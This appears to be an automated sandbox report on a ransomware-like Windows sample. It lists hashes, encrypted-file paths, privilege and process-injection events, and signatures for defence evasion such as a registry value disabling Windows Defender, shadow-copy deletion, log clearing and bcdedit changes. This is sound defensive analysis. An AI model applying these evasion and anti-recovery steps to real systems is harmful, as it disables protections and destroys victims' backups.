Analysis
-
max time kernel
56s -
max time network
14s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 13:50
Static task
static1
Behavioral task
behavioral1
Sample
08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe
Resource
win7-en-20211208
General
-
Target
08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe
-
Size
2.8MB
-
MD5
eaca98262691a07d6251902bcbdc1083
-
SHA1
64cda1eb126efe6f2217a5a8a86baac17e09554d
-
SHA256
08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402
-
SHA512
d564fabffd1af3c798d3df293f7e945decb68243e0e015445ca470091c0fc1db8bcf7e1f8947d00791b3073e578f9edc50dbe1418672ccc71d9c130a34cb00ca
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1188 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1396 bcdedit.exe 752 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\HST.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_vZfD-V18bxw0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office64.en-us\Office64MUI.XML.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_wpqccwWqSQ00.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD08758_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_nbxKFTnjfCw0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00057_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_s--HhbcbPHc0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18218_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_ZVZ_GPEsNBQ0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18223_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_R8NOtC1gppM0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Sort\TAG.XSL.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_I4sn0JUgCAg0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_QL9MgxSGUws0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_7NQdiSHeNsc0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_aMOqLMxR8e80.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\js\settings.js 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\23.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_eu-dVV33kZY0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_ev_-27KNk5E0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.access.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_LndxBTbxB_w0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\slideShow.html 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yerevan.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_jIbtgodAJFg0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_qaano4YQqxE0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21343_.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_munT2o7C26A0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR38F.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_J5scqS3DNII0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_4z-hOkFJlRU0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_N6L8jBrR-ow0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr__AncrF1MLFE0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00257_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_gvttde7q2MA0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR20F.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_0W4IcU_rBeU0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\background.gif.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_TJIa3I7Bt5Y0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Microsoft Games\Chess\ChessMCE.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\service.js 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01162_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_1Nr22t1O6D40.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287415.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_rPylWeJ7pps0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\TAB_OFF.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_0mCG4G8iwpM0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_Twee6Ne4A_00.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_I_HOtQAf5Ao0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_dvNCxjanJTE0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\8.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01246_.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_p829PzQtYR80.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-over-select.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_PGm3nfRTeqk0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10300_.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr__Opr0xkiY2Y0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00693_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_aRW8nZkXQvc0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_Vou8PlWdtpQ0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_mv7o_dCdLmY0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_select-highlight.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\New_York.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_o9jzJrgCYY00.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLEX.DAT.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_iGsniWrgvb40.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Adelaide.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_ZLQq19hF2EQ0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\settings.js 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_HSKbDrluAKM0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00687_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_r27Plihq67Y0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunec.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_rYfPHSQYOFs0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Azores.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_q-u2tKYvW1M0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\gadget.xml 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME34.CSS.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_KwQsK0fpn2A0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\OrangeCircles.jpg 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EN00319_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_Oohs1Dt8RLU0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_0sN_Ad_TUnw0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\micaut.dll.mui 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\default.jfc.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_7ztsbxZLeEI0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_wigUdjK1l9E0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_ouWHgh-wETo0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_ja.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_rD5yhPmq55o0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1708 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exe08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exepid process 1956 powershell.exe 1500 powershell.exe 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 328 wevtutil.exe Token: SeBackupPrivilege 328 wevtutil.exe Token: SeSecurityPrivilege 1908 wevtutil.exe Token: SeBackupPrivilege 1908 wevtutil.exe Token: SeSecurityPrivilege 1940 wevtutil.exe Token: SeBackupPrivilege 1940 wevtutil.exe Token: SeIncreaseQuotaPrivilege 964 wmic.exe Token: SeSecurityPrivilege 964 wmic.exe Token: SeTakeOwnershipPrivilege 964 wmic.exe Token: SeLoadDriverPrivilege 964 wmic.exe Token: SeSystemProfilePrivilege 964 wmic.exe Token: SeSystemtimePrivilege 964 wmic.exe Token: SeProfSingleProcessPrivilege 964 wmic.exe Token: SeIncBasePriorityPrivilege 964 wmic.exe Token: SeCreatePagefilePrivilege 964 wmic.exe Token: SeBackupPrivilege 964 wmic.exe Token: SeRestorePrivilege 964 wmic.exe Token: SeShutdownPrivilege 964 wmic.exe Token: SeDebugPrivilege 964 wmic.exe Token: SeSystemEnvironmentPrivilege 964 wmic.exe Token: SeRemoteShutdownPrivilege 964 wmic.exe Token: SeUndockPrivilege 964 wmic.exe Token: SeManageVolumePrivilege 964 wmic.exe Token: 33 964 wmic.exe Token: 34 964 wmic.exe Token: 35 964 wmic.exe Token: SeIncreaseQuotaPrivilege 1552 wmic.exe Token: SeSecurityPrivilege 1552 wmic.exe Token: SeTakeOwnershipPrivilege 1552 wmic.exe Token: SeLoadDriverPrivilege 1552 wmic.exe Token: SeSystemProfilePrivilege 1552 wmic.exe Token: SeSystemtimePrivilege 1552 wmic.exe Token: SeProfSingleProcessPrivilege 1552 wmic.exe Token: SeIncBasePriorityPrivilege 1552 wmic.exe Token: SeCreatePagefilePrivilege 1552 wmic.exe Token: SeBackupPrivilege 1552 wmic.exe Token: SeRestorePrivilege 1552 wmic.exe Token: SeShutdownPrivilege 1552 wmic.exe Token: SeDebugPrivilege 1552 wmic.exe Token: SeSystemEnvironmentPrivilege 1552 wmic.exe Token: SeRemoteShutdownPrivilege 1552 wmic.exe Token: SeUndockPrivilege 1552 wmic.exe Token: SeManageVolumePrivilege 1552 wmic.exe Token: 33 1552 wmic.exe Token: 34 1552 wmic.exe Token: 35 1552 wmic.exe Token: SeIncreaseQuotaPrivilege 1552 wmic.exe Token: SeSecurityPrivilege 1552 wmic.exe Token: SeTakeOwnershipPrivilege 1552 wmic.exe Token: SeLoadDriverPrivilege 1552 wmic.exe Token: SeSystemProfilePrivilege 1552 wmic.exe Token: SeSystemtimePrivilege 1552 wmic.exe Token: SeProfSingleProcessPrivilege 1552 wmic.exe Token: SeIncBasePriorityPrivilege 1552 wmic.exe Token: SeCreatePagefilePrivilege 1552 wmic.exe Token: SeBackupPrivilege 1552 wmic.exe Token: SeRestorePrivilege 1552 wmic.exe Token: SeShutdownPrivilege 1552 wmic.exe Token: SeDebugPrivilege 1552 wmic.exe Token: SeSystemEnvironmentPrivilege 1552 wmic.exe Token: SeRemoteShutdownPrivilege 1552 wmic.exe Token: SeUndockPrivilege 1552 wmic.exe Token: SeManageVolumePrivilege 1552 wmic.exe Token: 33 1552 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1668 wrote to memory of 1548 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1668 wrote to memory of 1548 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1668 wrote to memory of 1548 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1548 wrote to memory of 648 1548 net.exe net1.exe PID 1548 wrote to memory of 648 1548 net.exe net1.exe PID 1548 wrote to memory of 648 1548 net.exe net1.exe PID 1668 wrote to memory of 1328 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1668 wrote to memory of 1328 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1668 wrote to memory of 1328 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1328 wrote to memory of 1632 1328 net.exe net1.exe PID 1328 wrote to memory of 1632 1328 net.exe net1.exe PID 1328 wrote to memory of 1632 1328 net.exe net1.exe PID 1668 wrote to memory of 1380 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1668 wrote to memory of 1380 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1668 wrote to memory of 1380 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1380 wrote to memory of 1072 1380 net.exe net1.exe PID 1380 wrote to memory of 1072 1380 net.exe net1.exe PID 1380 wrote to memory of 1072 1380 net.exe net1.exe PID 1668 wrote to memory of 664 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1668 wrote to memory of 664 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1668 wrote to memory of 664 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 664 wrote to memory of 1332 664 net.exe net1.exe PID 664 wrote to memory of 1332 664 net.exe net1.exe PID 664 wrote to memory of 1332 664 net.exe net1.exe PID 1668 wrote to memory of 452 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1668 wrote to memory of 452 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1668 wrote to memory of 452 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 452 wrote to memory of 752 452 net.exe net1.exe PID 452 wrote to memory of 752 452 net.exe net1.exe PID 452 wrote to memory of 752 452 net.exe net1.exe PID 1668 wrote to memory of 956 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1668 wrote to memory of 956 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1668 wrote to memory of 956 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 956 wrote to memory of 1092 956 net.exe net1.exe PID 956 wrote to memory of 1092 956 net.exe net1.exe PID 956 wrote to memory of 1092 956 net.exe net1.exe PID 1668 wrote to memory of 1052 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1668 wrote to memory of 1052 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1668 wrote to memory of 1052 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1052 wrote to memory of 1488 1052 net.exe net1.exe PID 1052 wrote to memory of 1488 1052 net.exe net1.exe PID 1052 wrote to memory of 1488 1052 net.exe net1.exe PID 1668 wrote to memory of 1100 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1668 wrote to memory of 1100 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1668 wrote to memory of 1100 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 1100 wrote to memory of 1532 1100 net.exe net1.exe PID 1100 wrote to memory of 1532 1100 net.exe net1.exe PID 1100 wrote to memory of 1532 1100 net.exe net1.exe PID 1668 wrote to memory of 1660 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 1668 wrote to memory of 1660 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 1668 wrote to memory of 1660 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 1668 wrote to memory of 984 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe PID 1668 wrote to memory of 984 1668 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe sc.exe 